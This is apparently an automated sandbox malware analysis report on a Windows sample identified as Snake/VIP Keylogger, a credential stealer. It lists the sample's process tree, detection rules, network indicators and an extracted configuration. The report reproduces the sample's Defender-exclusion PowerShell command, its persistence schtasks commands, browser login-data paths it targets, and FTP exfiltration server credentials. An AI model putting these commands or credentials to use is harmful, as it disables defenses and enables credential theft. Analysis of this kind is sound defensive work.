Edit tour

Windows Analysis Report
Ti5nuRV7y4.exe

Overview

General Information

Sample name:	Ti5nuRV7y4.exe renamed because original name is a hash value
Original sample name:	228e6f4564fe08c94660250de5fc8832ce73b21edad1e81f6969c9a6dedbbfa9.exe
Analysis ID:	1569417
MD5:	3c70df024ff5a65f0785b0075939c3fd
SHA1:	05d7f92c1a6fec90ba6ab3a9b08944adbfe36832
SHA256:	228e6f4564fe08c94660250de5fc8832ce73b21edad1e81f6969c9a6dedbbfa9
Tags:	exeSnakeKeyloggeruser-adrian__luca
Infos:

Detection

PureLog Stealer, Snake Keylogger, VIP Keylogger

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Scheduled temp file as task from temp location

Yara detected AntiVM3

Yara detected PureLog Stealer

Yara detected Snake Keylogger

Yara detected Telegram RAT

Yara detected VIP Keylogger

.NET source code contains method to dynamically call methods (often used by packers)

.NET source code contains potential unpacker

AI detected suspicious sample

Adds a directory exclusion to Windows Defender

Injects a PE file into a foreign processes

Loading BitLocker PowerShell Module

Machine Learning detection for dropped file

Machine Learning detection for sample

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Tries to detect the country of the analysis system (by using the IP)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Uses schtasks.exe or at.exe to add and modify task schedules

Uses the Telegram API (likely for C&C communication)

Yara detected Generic Downloader

Allocates memory with a write watch (potentially for evading sandboxes)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Powershell Defender Exclusion

Sigma detected: Suspicious Add Scheduled Task Parent

Sigma detected: Suspicious Schtasks From Env Var Folder

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

Ti5nuRV7y4.exe (PID: 792 cmdline: "C:\Users\user\Desktop\Ti5nuRV7y4.exe" MD5: 3C70DF024FF5A65F0785B0075939C3FD)

powershell.exe (PID: 6132 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Ti5nuRV7y4.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 5884 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 6404 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\aoTiGLRa.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 2064 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WmiPrvSE.exe (PID: 7480 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)

schtasks.exe (PID: 400 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\aoTiGLRa" /XML "C:\Users\user\AppData\Local\Temp\tmpD06F.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 1648 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

Ti5nuRV7y4.exe (PID: 7308 cmdline: "C:\Users\user\Desktop\Ti5nuRV7y4.exe" MD5: 3C70DF024FF5A65F0785B0075939C3FD)

aoTiGLRa.exe (PID: 7560 cmdline: C:\Users\user\AppData\Roaming\aoTiGLRa.exe MD5: 3C70DF024FF5A65F0785B0075939C3FD)

schtasks.exe (PID: 7676 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\aoTiGLRa" /XML "C:\Users\user\AppData\Local\Temp\tmpECC1.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 7684 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

aoTiGLRa.exe (PID: 7728 cmdline: "C:\Users\user\AppData\Roaming\aoTiGLRa.exe" MD5: 3C70DF024FF5A65F0785B0075939C3FD)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
404 Keylogger, Snake Keylogger	Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.	No Attribution	https://any.run/cybersecurity-blog/analyzing-snake-keylogger/ https://any.run/cybersecurity-blog/reverse-engineering-snake-keylogger/ https://blog.netlab.360.com/purecrypter https://blog.nviso.eu/2022/04/06/analyzing-a-multilayer-maldoc-a-beginners-guide/ https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord	https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: VIP Keylogger

{"Exfil Mode": "FTP", "Username": "anonymous_log@kashmirestore.com", "Password": "c%P+6,(]YFvP", "FTP Server": "ftp://kashmirestore.com/", "Version": "4.4"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000002.1316105655.0000000007340000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0000000E.00000002.3699461711.00000000033D4000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000014.00000002.3695367843.0000000000430000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000014.00000002.3695367843.0000000000430000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000014.00000002.3695367843.0000000000430000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000014.00000002.3699672767.0000000003533000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000014.00000002.3699672767.0000000003341000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
0000000E.00000002.3699461711.00000000031E1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000000.00000002.1310956268.0000000003FE9000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.1310956268.0000000003FE9000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000000.00000002.1310956268.0000000003FE9000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000000.00000002.1310956268.0000000003FE9000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000000.00000002.1310956268.0000000003FE9000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2e94f:$a1: get_encryptedPassword 0x199b47:$a1: get_encryptedPassword 0x1dd567:$a1: get_encryptedPassword 0x2ec6c:$a2: get_encryptedUsername 0x199e64:$a2: get_encryptedUsername 0x1dd884:$a2: get_encryptedUsername 0x2e75f:$a3: get_timePasswordChanged 0x199957:$a3: get_timePasswordChanged 0x1dd377:$a3: get_timePasswordChanged 0x2e868:$a4: get_passwordField 0x199a60:$a4: get_passwordField 0x1dd480:$a4: get_passwordField 0x2e965:$a5: set_encryptedPassword 0x199b5d:$a5: set_encryptedPassword 0x1dd57d:$a5: set_encryptedPassword 0x3003e:$a7: get_logins 0x19b236:$a7: get_logins 0x1dec56:$a7: get_logins 0x2ffa1:$a10: KeyLoggerEventArgs 0x19b199:$a10: KeyLoggerEventArgs 0x1debb9:$a10: KeyLoggerEventArgs
Process Memory Space: Ti5nuRV7y4.exe PID: 792	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: Ti5nuRV7y4.exe PID: 792	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: Ti5nuRV7y4.exe PID: 792	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
Process Memory Space: Ti5nuRV7y4.exe PID: 792	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: Ti5nuRV7y4.exe PID: 792	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x5ebd2:$a1: get_encryptedPassword 0x5eee5:$a2: get_encryptedUsername 0x5e9ec:$a3: get_timePasswordChanged 0x5eaf5:$a4: get_passwordField 0x5ebe8:$a5: set_encryptedPassword 0x61094:$a7: get_logins 0x60ff7:$a10: KeyLoggerEventArgs 0x60c60:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: Ti5nuRV7y4.exe PID: 7308	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: Ti5nuRV7y4.exe PID: 7308	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: aoTiGLRa.exe PID: 7560	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: aoTiGLRa.exe PID: 7728	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: aoTiGLRa.exe PID: 7728	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
Process Memory Space: aoTiGLRa.exe PID: 7728	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Click to see the 19 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.Ti5nuRV7y4.exe.7340000.3.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.2.Ti5nuRV7y4.exe.7340000.3.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
20.2.aoTiGLRa.exe.400000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
20.2.aoTiGLRa.exe.400000.0.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
20.2.aoTiGLRa.exe.400000.0.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
20.2.aoTiGLRa.exe.400000.0.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3bde6:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3b489:$a3: \Google\Chrome\User Data\Default\Login Data 0x3b6e6:$a4: \Orbitum\User Data\Default\Login Data 0x3c0c5:$a5: \Kometa\User Data\Default\Login Data
20.2.aoTiGLRa.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2ec00:$s1: UnHook 0x2ec07:$s2: SetHook 0x2ec0f:$s3: CallNextHook 0x2ec1c:$s4: _hook
0.2.Ti5nuRV7y4.exe.3fe9970.1.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.Ti5nuRV7y4.exe.3fe9970.1.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0.2.Ti5nuRV7y4.exe.3fe9970.1.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.Ti5nuRV7y4.exe.3fe9970.1.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2c1df:$a1: get_encryptedPassword 0x2c4fc:$a2: get_encryptedUsername 0x2bfef:$a3: get_timePasswordChanged 0x2c0f8:$a4: get_passwordField 0x2c1f5:$a5: set_encryptedPassword 0x2d8ce:$a7: get_logins 0x2d831:$a10: KeyLoggerEventArgs 0x2d496:$a11: KeyLoggerEventArgsEventHandler
0.2.Ti5nuRV7y4.exe.3fe9970.1.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x39fe6:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x39689:$a3: \Google\Chrome\User Data\Default\Login Data 0x398e6:$a4: \Orbitum\User Data\Default\Login Data 0x3a2c5:$a5: \Kometa\User Data\Default\Login Data
0.2.Ti5nuRV7y4.exe.3fe9970.1.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2ce00:$s1: UnHook 0x2ce07:$s2: SetHook 0x2ce0f:$s3: CallNextHook 0x2ce1c:$s4: _hook
0.2.Ti5nuRV7y4.exe.40ccd48.2.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.Ti5nuRV7y4.exe.40ccd48.2.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.2.Ti5nuRV7y4.exe.40ccd48.2.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0.2.Ti5nuRV7y4.exe.40ccd48.2.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.Ti5nuRV7y4.exe.40ccd48.2.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0xb5dff:$a1: get_encryptedPassword 0xf981f:$a1: get_encryptedPassword 0xb611c:$a2: get_encryptedUsername 0xf9b3c:$a2: get_encryptedUsername 0xb5c0f:$a3: get_timePasswordChanged 0xf962f:$a3: get_timePasswordChanged 0xb5d18:$a4: get_passwordField 0xf9738:$a4: get_passwordField 0xb5e15:$a5: set_encryptedPassword 0xf9835:$a5: set_encryptedPassword 0xb74ee:$a7: get_logins 0xfaf0e:$a7: get_logins 0xb7451:$a10: KeyLoggerEventArgs 0xfae71:$a10: KeyLoggerEventArgs 0xb70b6:$a11: KeyLoggerEventArgsEventHandler 0xfaad6:$a11: KeyLoggerEventArgsEventHandler
0.2.Ti5nuRV7y4.exe.40ccd48.2.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0xb6a20:$s1: UnHook 0xfa440:$s1: UnHook 0xb6a27:$s2: SetHook 0xfa447:$s2: SetHook 0xb6a2f:$s3: CallNextHook 0xfa44f:$s3: CallNextHook 0xb6a3c:$s4: _hook 0xfa45c:$s4: _hook
0.2.Ti5nuRV7y4.exe.3fe9970.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.Ti5nuRV7y4.exe.3fe9970.1.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.2.Ti5nuRV7y4.exe.3fe9970.1.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0.2.Ti5nuRV7y4.exe.3fe9970.1.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.Ti5nuRV7y4.exe.3fe9970.1.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.2.Ti5nuRV7y4.exe.3fe9970.1.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2dfdf:$a1: get_encryptedPassword 0x1991d7:$a1: get_encryptedPassword 0x1dcbf7:$a1: get_encryptedPassword 0x2e2fc:$a2: get_encryptedUsername 0x1994f4:$a2: get_encryptedUsername 0x1dcf14:$a2: get_encryptedUsername 0x2ddef:$a3: get_timePasswordChanged 0x198fe7:$a3: get_timePasswordChanged 0x1dca07:$a3: get_timePasswordChanged 0x2def8:$a4: get_passwordField 0x1990f0:$a4: get_passwordField 0x1dcb10:$a4: get_passwordField 0x2dff5:$a5: set_encryptedPassword 0x1991ed:$a5: set_encryptedPassword 0x1dcc0d:$a5: set_encryptedPassword 0x2f6ce:$a7: get_logins 0x19a8c6:$a7: get_logins 0x1de2e6:$a7: get_logins 0x2f631:$a10: KeyLoggerEventArgs 0x19a829:$a10: KeyLoggerEventArgs 0x1de249:$a10: KeyLoggerEventArgs
0.2.Ti5nuRV7y4.exe.3fe9970.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2ec00:$s1: UnHook 0x199df8:$s1: UnHook 0x1dd818:$s1: UnHook 0x2ec07:$s2: SetHook 0x199dff:$s2: SetHook 0x1dd81f:$s2: SetHook 0x2ec0f:$s3: CallNextHook 0x199e07:$s3: CallNextHook 0x1dd827:$s3: CallNextHook 0x2ec1c:$s4: _hook 0x199e14:$s4: _hook 0x1dd834:$s4: _hook
Click to see the 21 entries

Sigma Signatures

System Summary

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Ti5nuRV7y4.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Ti5nuRV7y4.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Ti5nuRV7y4.exe", ParentImage: C:\Users\user\Desktop\Ti5nuRV7y4.exe, ParentProcessId: 792, ParentProcessName: Ti5nuRV7y4.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Ti5nuRV7y4.exe", ProcessId: 6132, ProcessName: powershell.exe

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Suspicious Add Scheduled Task Parent

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\aoTiGLRa" /XML "C:\Users\user\AppData\Local\Temp\tmpECC1.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\aoTiGLRa" /XML "C:\Users\user\AppData\Local\Temp\tmpECC1.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\aoTiGLRa.exe, ParentImage: C:\Users\user\AppData\Roaming\aoTiGLRa.exe, ParentProcessId: 7560, ParentProcessName: aoTiGLRa.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\aoTiGLRa" /XML "C:\Users\user\AppData\Local\Temp\tmpECC1.tmp", ProcessId: 7676, ProcessName: schtasks.exe

Sigma detected: Suspicious Schtasks From Env Var Folder

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\aoTiGLRa" /XML "C:\Users\user\AppData\Local\Temp\tmpD06F.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\aoTiGLRa" /XML "C:\Users\user\AppData\Local\Temp\tmpD06F.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\Ti5nuRV7y4.exe", ParentImage: C:\Users\user\Desktop\Ti5nuRV7y4.exe, ParentProcessId: 792, ParentProcessName: Ti5nuRV7y4.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\aoTiGLRa" /XML "C:\Users\user\AppData\Local\Temp\tmpD06F.tmp", ProcessId: 400, ProcessName: schtasks.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Ti5nuRV7y4.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Ti5nuRV7y4.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Ti5nuRV7y4.exe", ParentImage: C:\Users\user\Desktop\Ti5nuRV7y4.exe, ParentProcessId: 792, ParentProcessName: Ti5nuRV7y4.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Ti5nuRV7y4.exe", ProcessId: 6132, ProcessName: powershell.exe

Persistence and Installation Behavior

Sigma detected: Scheduled temp file as task from temp location

Source: Process started

Author: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\aoTiGLRa" /XML "C:\Users\user\AppData\Local\Temp\tmpD06F.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\aoTiGLRa" /XML "C:\Users\user\AppData\Local\Temp\tmpD06F.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\Ti5nuRV7y4.exe", ParentImage: C:\Users\user\Desktop\Ti5nuRV7y4.exe, ParentProcessId: 792, ParentProcessName: Ti5nuRV7y4.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\aoTiGLRa" /XML "C:\Users\user\AppData\Local\Temp\tmpD06F.tmp", ProcessId: 400, ProcessName: schtasks.exe

Suricata Signatures

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-05T18:51:15.131908+0100	2803305	3	Unknown Traffic	192.168.2.7	49707	104.21.67.152	443	TCP
2024-12-05T18:51:18.372397+0100	2803305	3	Unknown Traffic	192.168.2.7	49715	104.21.67.152	443	TCP
2024-12-05T18:51:21.581396+0100	2803305	3	Unknown Traffic	192.168.2.7	49724	104.21.67.152	443	TCP
2024-12-05T18:51:24.831550+0100	2803305	3	Unknown Traffic	192.168.2.7	49741	104.21.67.152	443	TCP
2024-12-05T18:51:28.140597+0100	2803305	3	Unknown Traffic	192.168.2.7	49753	104.21.67.152	443	TCP
2024-12-05T18:51:28.152616+0100	2803305	3	Unknown Traffic	192.168.2.7	49752	104.21.67.152	443	TCP
2024-12-05T18:51:37.951473+0100	2803305	3	Unknown Traffic	192.168.2.7	49788	104.21.67.152	443	TCP
2024-12-05T18:51:44.852421+0100	2803305	3	Unknown Traffic	192.168.2.7	49809	104.21.67.152	443	TCP

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-05T18:51:11.090059+0100	2803274	2	Potentially Bad Traffic	192.168.2.7	49703	132.226.8.169	80	TCP
2024-12-05T18:51:13.480698+0100	2803274	2	Potentially Bad Traffic	192.168.2.7	49703	132.226.8.169	80	TCP
2024-12-05T18:51:16.715089+0100	2803274	2	Potentially Bad Traffic	192.168.2.7	49708	132.226.8.169	80	TCP
2024-12-05T18:51:17.699485+0100	2803274	2	Potentially Bad Traffic	192.168.2.7	49714	132.226.8.169	80	TCP
2024-12-05T18:51:19.949509+0100	2803274	2	Potentially Bad Traffic	192.168.2.7	49714	132.226.8.169	80	TCP
2024-12-05T18:51:23.168230+0100	2803274	2	Potentially Bad Traffic	192.168.2.7	49732	132.226.8.169	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 0.2.Ti5nuRV7y4.exe.3fe9970.1.raw.unpack

Malware Configuration Extractor: VIP Keylogger {"Exfil Mode": "FTP", "Username": "anonymous_log@kashmirestore.com", "Password": "c%P+6,(]YFvP", "FTP Server": "ftp://kashmirestore.com/", "Version": "4.4"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe

ReversingLabs: Detection: 63%

Multi AV Scanner detection for submitted file

Source: Ti5nuRV7y4.exe

ReversingLabs: Detection: 63%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: Ti5nuRV7y4.exe

Joe Sandbox ML: detected

Location Tracking

Tries to detect the country of the analysis system (by using the IP)

Source: unknown

DNS query: name: reallyfreegeoip.org

Source: Ti5nuRV7y4.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 104.21.67.152:443 -> 192.168.2.7:49705 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 104.21.67.152:443 -> 192.168.2.7:49716 version: TLS 1.0

Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49795 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49815 version: TLS 1.2

Source: Ti5nuRV7y4.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Code function: 4x nop then jmp 076FCB4Eh	0_2_076FC372
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Code function: 4x nop then jmp 076FCB4Eh	0_2_076FC2D4
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Code function: 4x nop then jmp 0174F45Dh	14_2_0174F2C0
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Code function: 4x nop then jmp 0174F45Dh	14_2_0174F4AC
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Code function: 4x nop then jmp 0174FC19h	14_2_0174F961
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Code function: 4x nop then jmp 06CC31E0h	14_2_06CC2DC8
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Code function: 4x nop then jmp 06CC0D0Dh	14_2_06CC0B30
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Code function: 4x nop then jmp 06CC1697h	14_2_06CC0B30
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Code function: 4x nop then jmp 06CC2C19h	14_2_06CC2968
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Code function: 4x nop then jmp 06CCE959h	14_2_06CCE6B0
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Code function: 4x nop then jmp 06CCE0A9h	14_2_06CCDE00
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Code function: 4x nop then jmp 06CCF209h	14_2_06CCEF60
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Code function: 4x nop then jmp 06CCCF49h	14_2_06CCCCA0
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Code function: 4x nop then jmp 06CC31E0h	14_2_06CC2DB8
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Code function: 4x nop then jmp 06CCD7F9h	14_2_06CCD550
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Code function: 4x nop then jmp 06CCE501h	14_2_06CCE258
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Code function: 4x nop then jmp 06CCF661h	14_2_06CCF3B8
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Code function: 4x nop then jmp 06CCEDB1h	14_2_06CCEB08
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Code function: 4x nop then jmp 06CCD3A1h	14_2_06CCD0F8
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	14_2_06CC0040
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Code function: 4x nop then jmp 06CCFAB9h	14_2_06CCF810
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Code function: 4x nop then jmp 06CCDC51h	14_2_06CCD9A8
